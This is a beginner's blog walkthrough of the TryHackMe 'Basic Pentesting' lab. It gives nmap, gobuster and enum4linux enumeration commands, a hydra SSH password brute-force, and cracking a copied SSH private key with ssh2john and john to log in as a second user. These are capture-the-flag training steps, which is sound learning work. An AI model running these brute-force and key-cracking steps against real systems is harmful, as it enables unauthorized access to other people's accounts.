Open in app

Sign up

Sign in

Write

Sign up

Sign in

InfoSec Write-ups

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Follow publication

TryHackMe: Basic Pentesting

--

INTRODUCTION

Hola folks!! Naman Jain this side with my first Walk-through write-up. So please ignore any mistakes and grammar/spelling, lol XD.

Since this is my first CTF in life, so i decided to watch some tutorials from YouTube. I was aware of John Hammond’s uploading THM videos. So I jumped write there & and watch few of them so that when I do I don’t remember how he solved. And I tried after 3–4 days of watching videos. But I did remember some of the key points.

Not taking is long, So without further ado, let’s root into Basic Pentesting

Web App Testing and Privilege Escalation

So first for the initial/first phases, let’s start with what everybody begins with: Nmap

nmap -sC -sV -oN nmap <ip>
Sorry, forgot to take nmap ss ;p

Now time for some Directory Brute forcing:

gobuster dir -w <wordlist> -u <ip>

as you can see that, there’s a directory named ‘development’.

After checking a bit, doesn't seems to be useful, not let’s go further.

Now let’s Scan the host: for scanning I use enum4linux (yes, I did remember this from previous videos XD)

enum4linux -a <ip> | tee enum4linux.txt

and bingo, we found two users.

After knowing the username, what will you do?

Yes I did the same: SSHBrute Forcing. So I used hydra for doing the same:-

hydra -p jan -P <wordlist> ssh://<ip>
SSH_JAN

try connecting…

After searching some stuffs, we find that there's an another user’s directory in /home, i.e. kay.

Looked around and found nothing useful (but I do remember that something must to be found here). Than I used linePEAS (a tool for detecting PrivEsc) & found this:

Than I quickly searched for the same and remembered that yah, I was missing this.

Quickly copied the .ssh files to local machine and tried to connect with the user ‘kay’

ssh -i id_rsa kay@<ip>

And now it’s asking for the passphrase :(

Now for this, ssh2john will came in handy.

-> ssh2john id_rsa > kayssh-> john --wordlist=<wordlist> kayssh

And volia!!, we found the passwd:

Tried to login…… Success……and congrats!!

So that’s all for this room.

If you like this, than try supproting my sharing and giving a clap :)

signing off, Peace 🤞

| Room Link | Twitter | GitHub |

Tryhackme Walkthrough
Tryhackme
Tryhackme Writeup
Infosec
Ctf Writeup

--

--

InfoSec Write-ups
InfoSec Write-ups
Follow

Published in InfoSec Write-ups

57K Followers
Last published 19 hours ago

A collection of write-ups from the best hackers in the world on topics ranging from bug bounties and CTFs to vulnhub machines, hardware challenges and real life encounters. Subscribe to our weekly newsletter for the coolest infosec updates: https://weekly.infosecwriteups.com/

Follow
Naman Jain
Naman Jain
Follow

Written by Naman Jain

92 Followers
29 Following

Security Researcher @Credshields | Smart Contract Auditor

Follow

No responses yet

Write a response

What are your thoughts?

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech